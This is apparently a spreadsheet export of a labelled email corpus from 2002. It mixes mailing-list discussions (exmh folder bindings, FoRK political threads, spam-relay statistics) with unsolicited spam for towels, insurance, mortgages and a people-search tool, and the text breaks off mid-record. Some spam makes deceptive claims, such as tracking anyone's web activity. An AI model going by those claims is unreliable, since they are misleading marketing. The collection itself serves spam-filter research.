    <t>Both Move and Link are one-click actions.  on a folder label Move's the current message  on a folder label Link's the current message &gt;&gt;&gt;Robert Elz said:  &gt;     Date:        Thu, 12 Sep 2002 23:26:33 -0500  &gt;     From:        Hal DeVore   &gt;     Message-ID:  &lt;23204.1031891193@dimebox&gt;  &gt;   &gt;   | 1) Right click on the folder label in the folder list  &gt;   &gt; That (the way I have it configured, and it sounds as if the way Tony does  &gt; too) just does a move (rather than select as target without moving).  &gt;   &gt; Of course, if you can manage to get no messages currently selected, then  &gt; it works fine.  &gt;   &gt;   | 2) In the main window, the "+" key puts you into a "change   &gt;   |    folder" mode (the first time you use it after starting exmh),  &gt;   |    hit a second + and you go to "set a target" mode.  Type a few  &gt;   |    characters of the folder name and hit space for autocomplete.  &gt;   &gt; This works, but is not nice if you're not using the keyboard, but just  &gt; the mouse.  &gt;   &gt; Tony: I agree - a nice way to link in one click would be good, and should  &gt; be easy to add, though currently adding mouse bindings (something like  &gt; shift right click would be a good choice) is much harder than adding  &gt; key bindings.  &gt;   &gt; But note there's no need to "undo" - the way I generally use link, if  &gt; the desired destination folder isn't the current selected target, is  &gt; to right click on the target, which selects it and moves the message,  &gt; (and because I have the "automatic move to the next message on move or  &gt; link option set) select the message again, and then "Link".  &gt;   &gt; Exmh only permits one uncomitted action to be selected for a message at a  &gt; time, that is, one of delete, move, or link.   Selecting any of those  &gt; implicitly undoes any previous choice from the three (so you cannot  &gt; achieve a "move" by doing a link, then delete, then commit, it needs to  &gt; be link, commit, delete, commit).  (xmh was just the same there incidentally      ).  &gt;   &gt;   | How's spring shaping up "down under"?  &gt;   &gt; No meaningful comment from me, I'm not there at the minute.   But I'm told  &gt; that where I'm from it is cold, wet, and miserable, though has been better  &gt; during the day (sunny days, cold nights) for the past few.    In any case,  &gt; all of that is a good enough reason to stay away...  &gt;   &gt; kre  &gt;   &gt;   &gt;   &gt; _______________________________________________  &gt; Exmh-users mailing list  &gt; Exmh-users@redhat.com  &gt; [URL]https://listman.redhat.com[/URL] -- Brent Welch Software Architect, Panasas Inc Pioneering the World's Most Scalable and Agile Storage Network [URL]www.panasas.com[/URL] welch@panasas.com _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Tom &lt;tomwhore@slack.net&gt;\nFrom: "Stephen D. Williams" &lt;sdw@lig.net&gt;\nDate: Sun, 22 Sep 2002 21:35:28 -0400</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 21:35:28 -0400</t>
  </si>
  <si>
    <t>Re: SunMSapple meta4 of the day</t>
  </si>
  <si>
    <t>Clearly, it is US/NATO = Sun/IBM/OSS, USSR = MS\n\n"Where we want you to go in our 5 year plan?"\n\nsdw\n\nTom wrote:\n\n&gt;Im feeling a bit farklempt having spent the night at Todais with the\n&gt;family so talk amongst yourself..here Ill give you a topic\n&gt;\n&gt;The current state of IT can be thought of in terms of the Cold war with\n&gt;the US and the UUSR being MS and Sun/IBM/OSS (does it matter which side\n&gt;is which?), Apple as Cuba and the US legal system as the UN.\n&gt;\n&gt;Discuss.\n&gt;  \n&gt;\n\n-- \nsdw@lig.net [URL]http://sdw.st[/URL]\nStephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622\n703-724-0118W 703-995-0407Fax Dec2001</t>
  </si>
  <si>
    <t>http://sdw.st</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Sun, 22 Sep 2002 15:32:34 -0700</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 15:32:34 -0700</t>
  </si>
  <si>
    <t>Colonial Script ...</t>
  </si>
  <si>
    <t>Oh, they were plenty upset about the tea taxes. But the crack down on colonial script certainly screwed over the American Colonies.  And, BTW, England as well. Dear Ben Franklin was right for the wrong reasons.  First of all the colonies were not prosperous compared to England proper.  Second, the issuance of colonial script had nothing to do with full employeement. (In fact, it is almost inconceivable he would make that claim.  It sounds like a modern Keynsian was creating an urban legend.) OTOH the lack of sufficient circulating monetary instruments was economically crippling.  Imagine trying to buy your supplies by offering IOUs on your own name -- and then trying to market / exchange the paper as the merchant who took the IOU. =========================== The most common problem in the world is when a government prints too much money.  The effects are a complete disaster.  There are a lot of incentives that push governments into doing this even though it is incredibly stupid. So almost all the literature talks about that. But you can ALSO screw an economy over by taking all the money out of circulation.  The fundamental cause of the American Great Depression was exactly this, courtesy of the Federal Reserve Board. I don't think shifting the power to print money to the bank of Canada had much effect.  And Canada is still a prosperous country. &gt; -----Original Message----- &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of Gary &gt; Lawrence Murphy &gt; Sent: Saturday, September 21, 2002 7:31 AM &gt; To: Mr. FoRK &gt; Cc: fork@spamassassin.taint.org &gt; Subject: Re: sed /s/United States/Roman Empire/g &gt;  &gt; &gt;&gt;&gt;&gt;&gt; "f" == fork list  writes: &gt;  &gt;     f&gt; "Free trade and free markets have proven their ability to lift &gt;     f&gt; whole societies out of poverty" I'm not a &gt;     f&gt; socio-political/history buff - does anybody have some clear &gt;     f&gt; examples? &gt;  &gt; China?  Ooops, no wait, scratch that. &gt;  &gt; There is one counter example that I can think of, but it may not be &gt; precisely "free trade/markets" -- when Ben Franklin first visited &gt; England he was asked why the colonies were so prosperous.  Ben &gt; explained that they used "Colonial Script", a kind of barter-dollar, &gt; and increasing the supply of script ensured complete employment.  The &gt; British bankers were furious and immediately lobbied parliament to &gt; clamp down on the practice.  Within a few years, the colonies were &gt; rife with unemployment and poverty just like the rest of the Empire. &gt;  &gt; According to questionable literature handed out by a fringe political &gt; party here in Canada, the Founding Fathers had no real complaint about &gt; tea taxes, it was the banning of colonial script they were &gt; protesting. If this is true, then it comes right back to the forces &gt; that killed Ned Ludd's followers as to why popular opinion believes &gt; they were protesting a tea tax.  The same pamphlet claimed that Canada &gt; was also a prosperous nation until, by an act of parliament in the &gt; late-50's or early 60's, the right to print money was removed from the &gt; juristiction of parliament and handed over to the Bank of Canada. &gt;  &gt; I've wondered about all this.  Certainly the timeline of the collapse &gt; of the Canadian economy fits the profile, but there are oodles of &gt; other causes (for example, spending money like we had 300M people when &gt; we only had 20M) Anyone have any further information on this? &gt;  &gt; -- &gt; Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications &gt;  - blog: [URL]http://www.auracom.com[/URL] - biz: [URL]http://teledyn.com[/URL] - &gt;   "Computers are useless. They can only give you answers." (Picasso)</t>
  </si>
  <si>
    <t>http://www.auracom.com http://teledyn.com</t>
  </si>
  <si>
    <t>To: Justin Mason &lt;yyyy@spamassassin.taint.org&gt;\nFrom: Theo Van Dinter &lt;felicity@kluge.net&gt;\nDate: Sun, 22 Sep 2002 12:38:20 -0400</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 12:38:20 -0400</t>
  </si>
  <si>
    <t>Re: [SAtalk] telesp.net.br?</t>
  </si>
  <si>
    <t>--qcHopEYAB45HaUaB Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sun, Sep 22, 2002 at 02:33:48PM +0100, Justin Mason wrote: &gt; I seem to be getting a *lot* of spam relayed via these guys recently. &gt; Can others confirm this? &gt;=20 &gt; if it's the case, I'll come up with a forged-hostname test for it. I do get some from them, typically some dsl.telesp.net.br host: % grep -c telesp.net.br *| sort -rn spammers-2002-09:59 spammers-2002-08:64 spammers-2002-07:23 spammers-2002-06:13 spammers-2002-05:4 spammers-2002-04:2 Definitely increasing per month.  Percentage-wise:  2002-09 has 1212 spams in it, so 59/1212 is about 4.8%.  Last month was 3.6%. --=20 Randomly Generated Tagline: I don't believe I've ever cuddled my elses.               -- Larry Wall in &lt;199806221550.IAA07171@wall.org&gt; --qcHopEYAB45HaUaB Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see [URL]http://www.gnupg.org[/URL] iD8DBQE9jfH7AuOQUeWAs2MRAkcuAKDZpe2Imevx9OkqkCh1rKh2IXvv6ACfZ/kn aBRBTJx/PNPOZg5GNPk5b/s= =mUje -----END PGP SIGNATURE----- --qcHopEYAB45HaUaB--</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: bitbitch@magnesium.net\nDate: Sun, 22 Sep 2002 12:03:23 -0400</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 12:03:23 -0400</t>
  </si>
  <si>
    <t>dubyadubyadubya.dubyaspeak.com</t>
  </si>
  <si>
    <t>A worthy study procrastination tool: )\n\nA few choice phrases from ol dubya himself:\n\n"And all our history says we believe in liberty and justice for all,\nthat when we see oppression, we cry."\n\n"If you want to keep the peace, you've got to have the authorization to use force.\n-- White House, Sep. 19, 2002"\n\n"The United States will remain strong in our conviction that we must not, and will not,\n allow the world's worst leaders to hold the United States and our friends and allies blackmail,\n or threaten us with the world's worst weapons."  -- Whats truly sad\n about the "United States and our friends and allies /blackmail/, is\n that he said the same thing in the SAME speech in a paragraph or two\n before.\n\n\n "If you find a neighbor in need, you're responsible for serving that neighbor in need,\n  you're responsible for loving a neighbor just like you'd like to\n  love yourself."\n  -- Snerk.   This just begs for potty-mouth comedy.  Too bad the kids\n  on southpark just aren't that political.\n\n  "I want to send the signal to our enemy that you have aroused a compassionate and decent and mighty nation, and we're going to hunt you down.\n-- No, I didn't make this one up. Louisville, Kentucky, Sep. 5, 2002\n\nHee.. Mkay.\n[URL]http://www.dubyaspeak.com[/URL]\n\n-- \nBest regards,\n bitbitch                          mailto:bitbitch@magnesium.net</t>
  </si>
  <si>
    <t>http://www.dubyaspeak.com</t>
  </si>
  <si>
    <t>To: "Owen Byrne" &lt;owen@permafrost.net&gt;\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Sun, 22 Sep 2002 11:15:34 -0400</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 11:15:34 -0400</t>
  </si>
  <si>
    <t>Crony Capitalism (was RE: sed /s/United States/Roman Empire/g)</t>
  </si>
  <si>
    <t>reminds me of Cheney during the VP debates, when he declared his wealth was not the product of government favors. [URL]http://www.ibiblio.org[/URL] m/07 (good time to refresh our memories re iraq . . .) starting a debate on govt. contracts, gg -----Original Message----- From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Owen Byrne Sent: Sunday, September 22, 2002 11:04 AM To: Owen Byrne Cc: Gary Lawrence Murphy; Mr. FoRK; fork@spamassassin.taint.org; Digital Bearer Settlement List Subject: Re: sed /s/United States/Roman Empire/g Owen Byrne wrote: &gt; R. A. Hettinga wrote: &gt; &gt;&gt; -----BEGIN PGP SIGNED MESSAGE----- &gt;&gt; Hash: SHA1 &gt;&gt; &gt;&gt; At 10:32 AM -0400 on 9/21/02, Gary Lawrence Murphy wrote: &gt;&gt; &gt;&gt; &gt;&gt; &gt;&gt; &gt;&gt;&gt; Cool --- I wasn't aware that the US had lifted it's population out &gt;&gt;&gt; of poverty! When did this happen? I wonder where the media gets the &gt;&gt;&gt; idea that the wealth gap is widening and deepening... &gt;&gt;&gt; &gt;&gt; &gt;&gt; &gt;&gt; All the world loves a smartass... &gt;&gt; &gt;&gt; :-). &gt;&gt; &gt;&gt; Seriously. Look at he life expectancy and human carrying capacity of &gt;&gt; this continent before the Europeans got here. Look at it now. Even &gt;&gt; for descendants of the original inhabitants. Even for the descendents &gt;&gt; of slaves, who were brought here by force. &gt;&gt; &gt;&gt; More stuff, cheaper. That's progress. &gt;&gt; &gt;&gt; Poverty, of course, is not relative. It's absolute. Disparity in &gt;&gt; wealth has nothing to do with it. &gt;&gt; &gt;&gt; It's like saying that groups have rights, when, in truth, only &gt;&gt; individuals do. Like group rights, "disparity" in wealth is &gt;&gt; statistical sophistry. &gt;&gt; &gt;&gt; &gt;&gt; Besides, even if you can't help the distribution, industrial wealth &gt;&gt; is almost always transitory, and so is relative poverty, even when &gt;&gt; there are no confiscatory death-taxes. The 20th anniversary Forbes &gt;&gt; 400 just came out, and only a few tens of people are still there &gt;&gt; since 1982, a time which had significantly higher marginal taxes on &gt;&gt; wealth, income, and inheritance than we do now. More to the point, &gt;&gt; they're nowhere near the top. &gt;&gt; &gt;&gt; Lovely quote from the Forbes 400 list: "and not a single Astor, Vanderbilt or Morgan rates a mention on the current Forbes Four Hundred. " But you have to studiously ignore the 4 Rockefellers, 3 Gettys, 3 Hearsts,  Fords, Kelloggs, Wrigleys, and so on. There are more self-made people on the list than I previously alluded to - I made a mistake. Most of them seem to have Ivy League educations, or are Ivy League dropouts, suggesting to me that they weren't exactly poor to start with. Some of them have lovely self-made stories like: #347, Johnston, Summerfield K Jr track this personTrack This Person  | See all Bacon Makers 70 , self made *Source: Food , Coca-Cola* (quote , executives , news ) Net Worth: *$680 mil* returnee Hometown: Chattanooga , TN *Marital Status:* married , 5 children Grandfather James and partner landed first Coca-Cola bottling franchise in 1899. Company passed down 3 generations to Summerfield 1950s. Became largest independent Coke bottler. Merged with Coca-Cola Enterprises 1991.   (...by a compensation committee) Owen</t>
  </si>
  <si>
    <t>http://www.ibiblio.org</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Sun, 22 Sep 2002 03:31:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 03:31:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>[vox] Founding Fathers on Religion</t>
  </si>
  <si>
    <t>Some interesting quotes...\n\n[URL]http://www.postfun.com[/URL]\n\n\nThomas Jefferson:\n\n"I have examined all the known superstitions of the word, and I do not\nfind in our particular superstition of Christianity one redeeming feature.\nThey are all alike founded on fables and mythology. Millions of innocent\nmen, women and children, since the introduction of Christianity, have been\nburnt, tortured, fined and imprisoned. What has been the effect of this\ncoercion? To make one half the world fools and the other half hypocrites;\nto support roguery and error all over the earth."\n\nSIX HISTORIC AMERICANS,\nby John E. Remsburg, letter to William Short\nJefferson again:\n\n"Christianity...(has become) the most perverted system that ever shone on\nman. ...Rogueries, absurdities and untruths were perpetrated upon the\nteachings of Jesus by a large band of dupes and importers led by Paul, the\nfirst great corrupter of the teaching of Jesus."</t>
  </si>
  <si>
    <t>http://www.postfun.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Sun, 22 Sep 2002 03:20:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>Sun, 22 Sep 2002 03:20:22 -0400 (EDT)</t>
  </si>
  <si>
    <t>[vox] Anarchist 'Scavenger Hunt' Raises D.C. Police Ire (fwd)</t>
  </si>
  <si>
    <t>Anarchist 'Scavenger Hunt' Raises D.C. Police Ire\nSat Sep 21, 3:37 PM ET\n\nWASHINGTON (Reuters) - An online "anarchist scavenger\nhunt" proposed for next week's annual meeting of the\nInternational Monetary Fund ( news - web sites) and\nWorld Bank ( news - web sites) here has raised the ire\nof police, who fear demonstrators could damage\nproperty and wreak havoc.\n\nBreak a McDonald's window, get 300 points. Puncture a\nWashington D.C. police car tire to win 75 points.\nScore 400 points for a pie in the face of a corporate\nexecutive or World Bank delegate.\n\nD.C. Assistant Police Chief Terrance Gainer told a\ncongressional hearing on Friday that law authorities\nwere in talks to decide whether planned protests were,\n"so deleterious to security efforts that we ought to\ntake proactive action."\n\nSeveral thousand people are expected to demonstrate\noutside the IMF and World Bank headquarters next\nweekend.\n\nThe Anti-Capitalist Convergence, a D.C.-based\nanarchist group, is also planning a day-long traffic\nblockade, banner-drops and protests against major\ncorporations in the downtown core.\n\nChuck, the 37 year-old webmaster of the anarchist site\n[URL]www.infoshop.org[/URL] who declined to give his last name,\ntold Reuters his scavenger hunt was meant as a joke.\n\n"People were asking for things to do when they come to\nD.C. We made the list to get people thinking, so they\ndon't do the boring, standard stuff," he said. "I\ndoubt people will actually keep track of what they do\nfor points."</t>
  </si>
  <si>
    <t>www.infoshop.org</t>
  </si>
  <si>
    <t>5002</t>
  </si>
  <si>
    <t>To: ""&lt;ruud@RUUD.ORG&gt;\nFrom: "Margaret"&lt;gyyyyy@public.ayptt.ha.cn&gt;\nDate: Wed,29 May 2002 17:51:47 +0800</t>
  </si>
  <si>
    <t>Wed,29 May 2002 17:51:47 +0800</t>
  </si>
  <si>
    <t>"Margaret"&lt;gyyyyy@public.ayptt.ha.cn&gt;</t>
  </si>
  <si>
    <t>""&lt;ruud@RUUD.ORG&gt;</t>
  </si>
  <si>
    <t>Dear Sirs,\nWe know your esteemed company in beach towels from Internet, and pleased to introduce us as a leading producer of high quality 100% cotton velour printed towels in China, we sincerely hope to establish a long-term business relationship with your esteemed company in this field.\n  \nOur major items are 100% cotton full printed velour towels of the following sizes and weights with a annual production capacity of one million dozens:\nDisney Standard:\n30X60 inches, weight  305grams/SM, 350gram/PC  \n40X70 inches, weight  305grams/SM, 550gram/PC  \nPlease refer to our website [URL]http://www.jacquard-towel.com[/URL] for more details ie patterns about our products.\nOnce you are interested in our products, we will give you a more favorable price.\nLooking forward to hearing from you soon \nThanks and best regards,\nMargaret/Sales Manager\nHenan Ziyang Textiles\n[URL]http://www.jacquard-towel.com[/URL]</t>
  </si>
  <si>
    <t>http://www.jacquard-towel.com http://www.jacquard-towel.com</t>
  </si>
  <si>
    <t>5754</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - Indianapolis Life" &lt;indylife@insurancemail.net&gt;\nDate: Wed, 7 Aug 2002 19:49:55 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 19:49:55 -0400</t>
  </si>
  <si>
    <t>"IQ - Indianapolis Life" &lt;indylife@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>&lt;yyyy@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>The Elite Equity Indexed U.L. Policy</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C23E2C.44242DA0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Vista Elite - The Equity Indexed UL Policy    with 100% Participation for the Life of the Contract!	  Interest Crediting Strategies  	  Basic Interest Strategy	  Five-Year Fixed-Term Interest Strategy	  Five-Year Equity Indexed Strategy	  Interest Crediting Strategy Linked to the S&amp;P 500*	  5 &amp; 15 Year No Lapse Guarantee** 	 High Commissionable Targets	  Designed for Cash Accumulation	  100% participation rate guaranteed for the life of the contract! 	  	  For more information, call or e-mail   us today!  800-831-4380 ? or ? Please fill out the form below for more information	  Name:	 	  E-mail:	 	  Phone:	 	  City:	 	 State:	 	  	  	    	    Indianapolis Life - an Amerus Company *"Standard &amp; Poor's", "S&amp;P", "S&amp;P 500" and "Standard and Poor's 500" are trademarks of The McGraw-Hill Companies, Inc. and have been licensed for use by Indianapolis Life Insurance Company. Indianapolis Life's EIL products are not sponsored, endorsed, sold or promoted by Standard &amp; Poor's, and Standard &amp; Poor's makes no representation regarding the advisability of purchasing these products. **May not be available in all states. For Broker Use Only. Not For Use With General Public. CNIL0140-0702  We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_0007_01C23E2C.44242DA0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable The Elite Equity Indexed U.L. Policy =20      =20     =20        =20            =20              =20                  Basic Interest Strategy =20                 Five-Year Fixed-Term Interest Strategy =20                 Five-Year Equity Indexed Strategy =20                 Interest Crediting Strategy Linked to the S&amp;P = 500* =20                 5 &amp; 15 Year No Lapse Guarantee** =20                 High Commissionable Targets =20                 Designed for Cash Accumulation =20            100% participation rate guaranteed for the life of the = contract! =20             =20            For more information, call or e-mail=20             us today!             — or — =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                         E-mail: =20                         Phone: =20                         City: State: =20                           =20                            =20              *"Standard &amp; = Poor's",=20               "S&amp;P", "S&amp;P 500" and = "Standard=20               and Poor's 500" are trademarks of The McGraw-Hill = Companies,=20               Inc. and have been licensed for use by Indianapolis Life = Insurance=20               Company. Indianapolis Life's EIL products are not = sponsored, endorsed,=20               sold or promoted by Standard &amp; Poor's, and Standard = &amp; Poor's=20               makes no representation regarding the advisability of = purchasing=20               these products. **May not be available in all states. For = Broker=20               Use Only. Not For Use With General Public.               CNIL0140-0702  =20     =20        We = don't want anyone=20         to receive our mailings who does not wish to. This is = professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: =20         [URL]http://www.Insurancemail.net[/URL] Legal Notice=20 =20 ------=_NextPart_000_0007_01C23E2C.44242DA0--</t>
  </si>
  <si>
    <t>http://www.Insurancemail.net http://www.Insurancemail.net</t>
  </si>
  <si>
    <t>5753</t>
  </si>
  <si>
    <t>To: &lt;yyyy@ntr.net&gt;\nFrom: alancrooks@mark9.hostserve21.com\nDate: Wed, 7 Aug 2002 19:23:46 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 19:23:46 -0400</t>
  </si>
  <si>
    <t>alancrooks@mark9.hostserve21.com</t>
  </si>
  <si>
    <t>&lt;yyyy@ntr.net&gt;</t>
  </si>
  <si>
    <t>Mortgage Rates Are Down.  teoqknmp</t>
  </si>
  <si>
    <t>When America's top companies compete for your business, you win.\n\n[URL]http://quotes.routeit21.com[/URL]\n\nTake a moment to let us show you that we are here to save you money and address your concerns with absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's top companies.\n\n\n-Mortgage rates that save you thousands.\n-New home loans.\n-Refinance or consolidate high interest credit card debt into a low interest mortgage.\n\n\n[URL]http://quotes.routeit21.com[/URL]\n\n\n"...was able to get 3 great offers in\nless than 24 hours." -Jennifer C\n\n"Met all my needs... being able to search\nfor loans in a way that puts me in control." -Robert T.\n\n"..it was easy, effortless...!"-Susan A.\n\n \n\nClick here to delete your address from future updates.\n[URL]http://quotes.routeit21.com[/URL]</t>
  </si>
  <si>
    <t>http://quotes.routeit21.com http://quotes.routeit21.com http://quotes.routeit21.com</t>
  </si>
  <si>
    <t>5747</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Soleil" &lt;events@thesoleilgroup.com&gt;\nDate: Wed, 7 Aug 2002 15:19:14 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 15:19:14 -0400</t>
  </si>
  <si>
    <t>"Soleil" &lt;events@thesoleilgroup.com&gt;</t>
  </si>
  <si>
    <t>TOMORROW -- Password: Soleil -- TV Casting</t>
  </si>
  <si>
    <t>Tomorrow will be huge.  Password: Soleil has become the premiere Thursday night in New York - with a chill after-work and a blazing late-night.  This Thursday, producers from Columbia Tristar are casting people for their new reality TV show.  \n\nWe invite all members of the media and entertainment industries for an exclusive event celebrating New York high-life.\n\nPassword: SOLEIL\nThursdays @Nativa\n5 East 19th Street\nb/w B'way &amp; 5th Ave.\nNew York, NY\n \n"SOLEIL" REQUIRED FOR ENTRY\nYou must say 'Soleil' at the door.\n \n$5 before 10pm\n \n6-8pm Happy Hour\nFree dinner buffet.\n1/2 price drinks.\nparty 'til 4am\n \nMusic: Hip-Hop, Reggae, Latin Soul, R&amp;B\n \nRSVP Recommended:\n212.591.1253\npassword@thesoleilgroup.com\n\n----------------\nTo be removed from this list, email: remove@thesoleilgroup.com with the word "remove" in the subject heading. \n----------------\n\n\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5749</t>
  </si>
  <si>
    <t>To: yyyy@netdados.com.br\nFrom: mtg4you147432@yahoo.com\nDate: Wed, 7 Aug 2002 13:16:20 -0700</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 13:16:20 -0700</t>
  </si>
  <si>
    <t>mtg4you147432@yahoo.com</t>
  </si>
  <si>
    <t>yyyy@netdados.com.br</t>
  </si>
  <si>
    <t>discounted mortgage broker 1474322</t>
  </si>
  <si>
    <t xml:space="preserve">  \n  \n\n\n  |  |  |\n\n**  \n****Dear Homeowner,**\n\n\n\n*** 6.25% 30 Yr Fixed Rate Mortgage**  \n  \n---  \n  \nInterest rates are at their lowest point in 40 years! We help you find the\nbest rate for your situation by matching your needs with hundreds of lenders!\n**Home Improvement** , **Refinance** , **Second Mortgage** , **Home Equity\nLoans, and More!** Even with less than perfect credit!  \n  \n**  \nClick Here for a Free Quote!**\n\n**Lock In YOUR LOW FIXED RATE TODAY**\n\n    **a NO COST OUT OF POCKET**     **a** **NO OBLIGATION**     **a** **FREE CONSULTATION**     **a** **ALL CREDIT GRADES ACCEPTED**\n\n**Rates as low as 6.25% won't stay this low forever CLICK HERE**\n\n\n\n*** based on mortgage rate as of 5-15-02 as low as 6.25% see lender for\ndetails**\n\n|\n\n\n\n|\n\n# H  \n  \n---|---|---  \n** | Apply now and one of our lending partners will get back to you within 48\nhours. |\n\n**CLICK HERE!**  \n  \n---|---  \n**  \n  \nremove [URL]http://www.cs220.com[/URL]\n\n1474322\n\n</t>
  </si>
  <si>
    <t>http://www.cs220.com</t>
  </si>
  <si>
    <t>5744</t>
  </si>
  <si>
    <t>To: vcosta@vol.com, smithstein@vel.net\nFrom: "New Product Showcase" &lt;see-msg_952621@flashmail.com&gt;\nDate: Wed, 7 Aug 2002 06:35:28 -0700</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 06:35:28 -0700</t>
  </si>
  <si>
    <t>"New Product Showcase" &lt;see-msg_952621@flashmail.com&gt;</t>
  </si>
  <si>
    <t>vcosta@vol.com, smithstein@vel.net</t>
  </si>
  <si>
    <t>New Version 7: Uncover the TRUTH about ANYONE!</t>
  </si>
  <si>
    <t>============================================= Brand-New VERSION 7.0 Just Released: Astounding New Software Lets You Find Out Almost ANYTHING about ANYONE... ============================================= Download it right now (no charge card needed): For the brand-new VERSION 7.0, click here: [URL]http://WWW.BIZH0ST0NE.NET[/URL]  Discover EVERYTHING you ever wanted to know about: your friends your family your enemies your employees yourself - Is Someone Using Your Identity? even your boss! DID YOU KNOW you can search for ANYONE, ANYTIME, ANYWHERE, right on the Internet? Download this software right now--click here: [URL]http://WWW.BIZH0ST0NE.NET[/URL]  This mammoth COLLECTION of internet investigative tools &amp; research sites will provide you with NEARLY 400 GIGANTIC SEARCH RESOURCES to locate information on: * people you trust * screen new tenants or roommates * housekeepers * current or past employment * people you work with * license plate number with name and address * unlisted phone numbers * long lost friends Locate e-mails, phone numbers, or addresses: o Get a Copy of Your FBI file. o Get a Copy of Your Military file. o FIND DEBTORS and locate HIDDEN ASSETS. o Check CRIMINAL Drug and driving RECORDS. o Lookup someone's EMPLOYMENT history. For the brand-new VERSION 7.0, click here: [URL]http://WWW.BIZH0ST0NE.NET[/URL]  Locate old classmates, missing family member, or a LONG LOST LOVE: - Do Background Checks on EMPLOYEES before you   hire them. - Investigate your family history, birth, death   and government records! - Discover how UNLISTED phone numbers are located. - Check out your new or old LOVE INTEREST. - Verify your own CREDIT REPORTS so you can   correct WRONG information. - Track anyone's Internet ACTIVITY; see the sites   they visit, and what they are typing. - Explore SECRET WEB SITES that conventional   search engines have never found. For the brand-new VERSION 7.0, click here: [URL]http://WWW.BIZH0ST0NE.NET[/URL]  ==&gt; Discover little-known ways to make UNTRACEABLE     PHONE CALLS. ==&gt; Check ADOPTION records; locate MISSING CHILDREN     or relatives. ==&gt; Dig up information on your FRIENDS, NEIGHBORS,     or BOSS! ==&gt; Discover EMPLOYMENT opportunities from AROUND     THE WORLD! ==&gt; Locate transcripts and COURT ORDERS from all     50 states. ==&gt; CLOAK your EMAIL so your true address can't     be discovered. ==&gt; Find out how much ALIMONY your neighbor is paying. ==&gt; Discover how to check your phones for WIRETAPS. ==&gt; Or check yourself out, and you will be shocked at     what you find!! These are only a few things you can do, There is no limit to the power of this software!! To download this software, and have it in less than 5 minutes click on the url below to visit our website (NEW: No charge card needed!) [URL]http://WWW.BIZH0ST0NE.NET[/URL]  If you no longer wish to hear about future offers from us, send us a message with STOP in the subject line, by clicking here: mailto:remv0615b@bk.ru?subject=STOP_MX727  Please allow up to 72 hours to take effect. Please do not include any correspondence in your message to this automatic stop robot--it will not be read. All requests processed automatically.  [FRYTE^3247(^(PO1:KJ)_8J7BJK9^"]</t>
  </si>
  <si>
    <t>http://WWW.BIZH0ST0NE.NET http://WWW.BIZH0ST0NE.NET http://WWW.BIZH0ST0NE.NET http://WWW.BIZH0ST0NE.NET http://WWW.BIZH0ST0NE.NET</t>
  </si>
  <si>
    <t>5093</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - Professional Planners Marketing Group" &lt;ppmg@insurancemail.net&gt;\nDate: Wed, 5 Jun 2002 19:26:26 -0400</t>
  </si>
  <si>
    <t>Wed, 5 Jun 2002 19:26:26 -0400</t>
  </si>
  <si>
    <t>"IQ - Professional Planners Marketing Group" &lt;ppmg@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>Free Step-By-Step Seminar Presentation</t>
  </si>
  <si>
